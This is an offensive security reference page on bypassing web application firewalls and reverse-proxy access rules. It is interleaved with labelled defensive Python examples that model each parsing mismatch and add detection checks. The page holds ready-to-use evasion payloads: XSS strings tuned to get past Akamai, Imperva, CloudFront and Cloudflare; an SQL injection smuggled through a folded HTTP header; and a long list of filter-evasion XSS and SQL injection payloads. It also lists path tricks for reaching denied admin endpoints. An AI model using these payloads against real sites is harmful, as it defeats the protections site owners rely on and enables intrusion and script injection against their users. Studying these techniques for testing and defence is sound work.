# Proxy / WAF Protections Bypass
{{#include ../banners/hacktricks-training.md}}
## Bypass Nginx ACL Rules with Pathname Manipulation <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
Technique [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
Example of Nginx rules:
```plaintext
location = /admin {
    deny all;
}
location = /admin/ {
    deny all;
}
```
In order to prevent bypasses, Nginx performs path normalization before checking it. However, if the backend server performs a different normalization (removing characters that nginx doesn't remove) it might be possible to bypass this defense.
### **NodeJS - Express**
| Nginx Version | **Node.js Bypass Characters** |
| ------------- | ----------------------------- |
| 1.22.0 | `\xA0` |
| 1.21.6 | `\xA0` |
| 1.20.2 | `\xA0`, `\x09`, `\x0C` |
| 1.18.0 | `\xA0`, `\x09`, `\x0C` |
| 1.16.1 | `\xA0`, `\x09`, `\x0C` |
### **Flask**
| Nginx Version | **Flask Bypass Characters** |
| ------------- | -------------------------------------------------------------- |
| 1.22.0 | `\x85`, `\xA0` |
| 1.21.6 | `\x85`, `\xA0` |
| 1.20.2 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.18.0 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.16.1 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
### **Spring Boot**
| Nginx Version | **Spring Boot Bypass Characters** |
| ------------- | --------------------------------- |
| 1.22.0 | `;` |
| 1.21.6 | `;` |
| 1.20.2 | `\x09`, `;` |
| 1.18.0 | `\x09`, `;` |
| 1.16.1 | `\x09`, `;` |
### **PHP-FPM**
Nginx FPM configuration:
```plaintext
location = /admin.php {
    deny all;
}
location ~ \.php$ {
    include snippets/fastcgi-php.conf;
    fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
```
Nginx is configured to block access to `/admin.php`, but it's possible to bypass this by accessing `/admin.php/index.php`.
### How to prevent
```plaintext
location ~* ^/admin {
    deny all;
}
```
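The following is an added example (not part of the page, the research it cites, or nginx itself) that models the two ACL styles shown above in Python, so the difference can be checked offline: an exact-match rule is compared against the decoded path, while the `~* ^/admin` rule is a case-insensitive prefix match that also covers anything appended after `/admin`. The request targets are constructed for the example, and placing the bypass byte from the tables at the end of the path is an assumption of this example; the set of flagged bytes is taken from those tables.

```python
import re
from urllib.parse import unquote_to_bytes

# Bytes that the tables above list as ignored or stripped by some backends.
# If the proxy compares the raw path and the backend strips these, the two
# components route to different resources.
SUSPICIOUS_PATH_BYTES = {0x09, 0x0B, 0x0C, 0x1C, 0x1D, 0x1E, 0x1F, 0x85, 0xA0}


def exact_match_deny(path: bytes) -> bool:
    """Models `location = /admin` and `location = /admin/` (deny all)."""
    return path in (b"/admin", b"/admin/")


def php_exact_deny(path: bytes) -> bool:
    """Models `location = /admin.php` from the PHP-FPM configuration above."""
    return path == b"/admin.php"


def prefix_match_deny(path: bytes) -> bool:
    """Models `location ~* ^/admin` (case-insensitive prefix regex)."""
    return re.match(rb"^/admin", path, re.IGNORECASE) is not None


def has_suspicious_bytes(path: bytes) -> bool:
    """Detection rule: legitimate paths rarely carry these bytes, so their
    presence is worth logging even when the ACL already denies the request."""
    return any(b in SUSPICIOUS_PATH_BYTES for b in path)


def evaluate(request_target: str) -> dict:
    """Percent-decode the request target (as nginx does before matching a
    location) and apply each rule style to the decoded path."""
    path = unquote_to_bytes(request_target)
    return {
        "decoded": path,
        "exact_denied": exact_match_deny(path) or php_exact_deny(path),
        "prefix_denied": prefix_match_deny(path),
        "suspicious": has_suspicious_bytes(path),
    }


# Constructed sample request targets for the demonstration.
SAMPLES = ["/admin", "/admin%A0", "/Admin", "/admin.php/index.php", "/admin%09", "/profile"]

if __name__ == "__main__":
    for target in SAMPLES:
        print(f"{target:24} {evaluate(target)}")
```

Run as a script to print one line per sample: the exact-match rules deny only `/admin`, whereas the prefix rule denies every sample that starts with `/admin` regardless of case or trailing bytes, and `has_suspicious_bytes` separately flags the ones carrying a control or non-ASCII byte.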
## Bypass Mod Security Rules <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
### Path Confusion
[**In this post**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) it is explained that ModSecurity v3 (until 3.0.12) **improperly implemented the `REQUEST_FILENAME`** variable, which was supposed to contain the accessed path (up to the start of the parameters). This is because it performed a URL decode to obtain the path.\
Therefore, a request like `http://example.com/foo%3f';alert(1);foo=` would make mod security think that the path is just `/foo`, because `%3f` is transformed into `?`, ending the URL path, while the path the server actually receives is `/foo%3f';alert(1);foo=`.
The variables `REQUEST_BASENAME` and `PATH_INFO` were also affected by this bug.
Something similar happened in version 2 of Mod Security that allowed bypassing a protection preventing users from accessing files with specific extensions related to backup files (such as `.bak`), simply by sending the dot URL encoded as `%2e`, for example: `https://example.com/backup%2ebak`.
## Bypass AWS WAF ACL <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
### Malformed Header
[This research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) mentions that it was possible to bypass AWS WAF rules applied over HTTP headers by sending a "malformed" header that was not properly parsed by AWS but was parsed by the backend server.
For example, sending the following request with a SQL injection in the X-Query header:
```http
GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n
```
It was possible to bypass AWS WAF because it did not understand that the next line was part of the header value, while the NODEJS server did (this has been fixed).
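As an added example (not part of the page, the cited research, or AWS), the two parsing behaviours described above can be reproduced with two minimal header parsers that differ only in whether they honour obs-fold continuation lines (a header line beginning with SP or HTAB continues the previous field, RFC 7230 section 3.2.4). The request bytes are the ones from the section above, reconstructed here as a constructed byte string; the parser names and the `has_obs_fold` check are this example's own.

```python
RAW_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: target.com\r\n"
    b"X-Query: Value\r\n"
    b"\t' or '1'='1' -- \r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def _header_lines(raw: bytes) -> list:
    """Return the header lines of a raw request, without the request line."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return head.split(b"\r\n")[1:]


def parse_ignoring_folds(raw: bytes) -> dict:
    """Models the inspecting component's view: a line that starts with
    whitespace is not a 'Name: value' line, so it is skipped and nothing in
    it is inspected. This is the failure mode the section describes."""
    headers = {}
    for line in _header_lines(raw):
        if line[:1] in (b" ", b"\t"):
            continue
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers


def parse_with_obs_fold(raw: bytes) -> dict:
    """Models the backend's view: a folded line is unfolded by appending it,
    separated by a single space, to the previous field's value."""
    headers = {}
    last = None
    for line in _header_lines(raw):
        if line[:1] in (b" ", b"\t") and last is not None:
            headers[last] = headers[last] + " " + line.strip().decode()
            continue
        name, _, value = line.partition(b":")
        last = name.strip().lower().decode()
        headers[last] = value.strip().decode()
    return headers


def parsers_disagree(raw: bytes) -> bool:
    """Detection idea: parse both ways and compare. Any difference means the
    WAF and the backend could be inspecting different header values."""
    return parse_ignoring_folds(raw) != parse_with_obs_fold(raw)


def has_obs_fold(raw: bytes) -> bool:
    """Cheap check a proxy can apply up front: reject requests that contain
    folded header lines at all, so no parser ever has to guess."""
    return any(line[:1] in (b" ", b"\t") for line in _header_lines(raw))


if __name__ == "__main__":
    print("WAF view:    ", parse_ignoring_folds(RAW_REQUEST).get("x-query"))
    print("backend view:", parse_with_obs_fold(RAW_REQUEST).get("x-query"))
    print("disagree:", parsers_disagree(RAW_REQUEST), "obs-fold:", has_obs_fold(RAW_REQUEST))
```

Running the script shows the inspecting parser seeing `X-Query: Value` while the unfolding parser sees the injected clause appended to the same value; rejecting any request for which `has_obs_fold` is true removes the ambiguity instead of trying to match the backend's leniency.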
## Generic WAF Bypasses
### Request Size Limits
Commonly WAFs have a certain length limit on the requests they inspect, and if a POST/PUT/PATCH request exceeds it, the WAF won't inspect that request.
- For AWS WAF, you can [**check the documentation**](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)**:**
<table data-header-hidden><thead><tr><th width="687"></th><th></th></tr></thead><tbody><tr><td>Maximum size of a web request body that can be inspected for Application Load Balancer and AWS AppSync protections</td><td>8 KB</td></tr><tr><td>Maximum size of a web request body that can be inspected for CloudFront, API Gateway, Amazon Cognito, App Runner, and Verified Access protections**</td><td>64 KB</td></tr></tbody></table>
- From the [**Azure docs**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**:**
Older Web Application Firewalls with Core Rule Set 3.1 (or lower) allow messages larger than **128 KB** by turning off request body inspection, but these messages won't be checked for vulnerabilities. For newer versions (Core Rule Set 3.2 or newer), the same can be done by disabling the maximum request body limit. When a request exceeds the size limit:
If **prevention mode**: Logs and blocks the request.\
If **detection mode**: Inspects up to the limit, ignores the rest, and logs if the `Content-Length` exceeds the limit.
- From [**Akamai**](https://community.akamai.com/customers/s/article/Can-WAF-inspect-all-arguments-and-values-in-request-body?language=en_US)**:**
By default, the WAF inspects only the first 8KB of a request. The limit can be raised to 128KB by adding Advanced Metadata.
- From [**Cloudflare**](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#http-request-body-fields)**:**
Up to 128KB.
### Obfuscation <a href="#obfuscation" id="obfuscation"></a>
```bash
# IIS, ASP Classic
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
```
### Unicode Compatibility <a href="#unicode-compatability" id="unicode-compatability"></a>
Depending on the implementation of Unicode normalization (more info [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), characters that share Unicode compatibility may be able to bypass the WAF and execute as the intended payload. Compatible characters can be found [here](https://www.compart.com/en/unicode).
#### Example <a href="#example" id="example"></a>
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
img src⁼p onerror⁼prompt⁽1⁾﹥ --> img src=p onerror='prompt(1)'>
```
### Bypass Contextual WAFs with encodings <a href="#ip-rotation" id="ip-rotation"></a>
As mentioned in [**this blog post**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization), in order to bypass WAFs that are able to keep the context of the user input, we can abuse the WAF's own normalization of that input.
For example, the post mentions that **Akamai URL decoded the user input 10 times**. Therefore, something like `<input/%2525252525252525253e/onfocus` will be seen by Akamai as `<input/>/onfocus`, which **might be considered fine as the tag is closed**. However, as long as the application doesn't URL decode the input 10 times, the victim will see something like `<input/%25252525252525253e/onfocus`, which is **still valid for an XSS attack**.
Therefore, this allows **hiding payloads in encoded parts** that the WAF will decode and interpret while the victim won't.
Moreover, this can be done not only with URL encoded payloads but also with other encodings like unicode, hex, octal...
In the post, the following final bypasses are suggested:
- Akamai:`akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>`
- Imperva:`imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">`
- AWS/Cloudfront:`docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>`
- Cloudflare:`cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">`
It is also mentioned that, depending on **how some WAFs understand the context** of the user input, it might be possible to abuse it. The example proposed in the blog is that Akamai allowed putting anything between `/*` and `*/` (probably because this is commonly used as a comment). Therefore, a SQL injection like `/*'or sleep(5)-- -*/` won't be caught and will be valid, as `/*` is the starting string of the injection and `*/` is commented.
These kinds of context problems can also be used to **abuse other vulnerabilities than the one the WAF expects** to be exploited (e.g. this could also be used to exploit an XSS).
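The following added example (not from the page or from either blog post it cites) puts both canonicalization mismatches discussed above, the Unicode compatibility example and the repeated URL decoding, side by side in Python. It shows what a filter sees if it inspects the raw string versus the folded string, and how many percent-decoding rounds the sample input needs before it stops changing; the 10-round figure is the one the post attributes to Akamai, the two sample inputs are the ones from the text reconstructed here as constructed strings, and all function names are this example's own.

```python
import unicodedata
from urllib.parse import unquote

# (1) Unicode compatibility characters. The example above uses U+207C
# (superscript equals), U+207D/U+207E (superscript parentheses) and U+FE65
# (small greater-than), which NFKC/NFKD fold to '=', '(', ')' and '>'.
UNICODE_SAMPLE = "img src\u207cp onerror\u207cprompt\u207d1\u207e\ufe65"
ASCII_METACHARS = set("<>=()'\"`")


def fold_compat(s: str, form: str = "NFKC") -> str:
    """Apply a compatibility normalization form (NFKC or NFKD)."""
    return unicodedata.normalize(form, s)


def metachars_raw(s: str) -> set:
    """Metacharacters a filter sees when it inspects the raw string."""
    return {c for c in s if c in ASCII_METACHARS}


def metachars_after_fold(s: str, form: str = "NFKC") -> set:
    """Metacharacters a filter sees when it folds before matching, which is
    the order that matches a backend that normalizes the input."""
    return metachars_raw(fold_compat(s, form))


# (2) Percent-decoding depth. Nine layers of %25 wrap a final %3e.
ENCODED_SAMPLE = "<input/%2525252525252525253e/onfocus"


def decode_n(s: str, n: int) -> str:
    """Percent-decode exactly n times (models a component that decodes n times)."""
    for _ in range(n):
        s = unquote(s)
    return s


def decode_depth(s: str, limit: int = 32) -> int:
    """Number of decode rounds until the string stops changing. A depth well
    above one is itself a strong signal worth alerting on."""
    for i in range(limit):
        nxt = unquote(s)
        if nxt == s:
            return i
        s = nxt
    return limit


def views_differ(s: str, waf_rounds: int, app_rounds: int) -> bool:
    """Mismatch indicator: the WAF's decoded view differs from the app's."""
    return decode_n(s, waf_rounds) != decode_n(s, app_rounds)


if __name__ == "__main__":
    print("raw metachars:   ", metachars_raw(UNICODE_SAMPLE))
    print("folded metachars:", metachars_after_fold(UNICODE_SAMPLE))
    print("folded string:   ", fold_compat(UNICODE_SAMPLE))
    print("decode depth:", decode_depth(ENCODED_SAMPLE))
    print("WAF view (10):", decode_n(ENCODED_SAMPLE, 10))
    print("app view (1): ", decode_n(ENCODED_SAMPLE, 1))
```

The practical takeaway for the defending side is in the two helper pairs: inspect the folded form rather than the raw one, and either decode to the fixed point on both sides or reject input whose `decode_depth` exceeds what the application itself performs.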
### H2C Smuggling <a href="#ip-rotation" id="ip-rotation"></a>
{{#ref}}
h2c-smuggling.md
{{#endref}}
### IP Rotation <a href="#ip-rotation" id="ip-rotation"></a>
- [https://github.com/ustayready/fireprox](https://github.com/ustayready/fireprox): Generate an API gateway URL to be used with ffuf
- [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin): Similar to fireprox
- [https://github.com/PortSwigger/ip-rotate](https://github.com/PortSwigger/ip-rotate): Burp Suite plugin that uses API gateway IPs
- [https://github.com/fyoorer/ShadowClone](https://github.com/fyoorer/ShadowClone): A dynamically determined number of container instances is launched based on the input file size and split factor, with the input split into chunks for parallel execution, such as 100 instances processing 100 chunks from a 10,000-line input file with a split factor of 100 lines.
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
### Regex Bypasses
Different techniques can be used to bypass the regex filters on firewalls. Examples include alternating case, adding line breaks, and encoding payloads. Resources for the various bypasses can be found at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) and [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). The examples below were pulled from [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
```bash
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parentheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
## Tools
- [**nowafpls**](https://github.com/assetnote/nowafpls): Burp plugin to add junk data to requests to bypass WAFs by length
## References
- [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
- [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
- [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
{{#include ../banners/hacktricks-training.md}}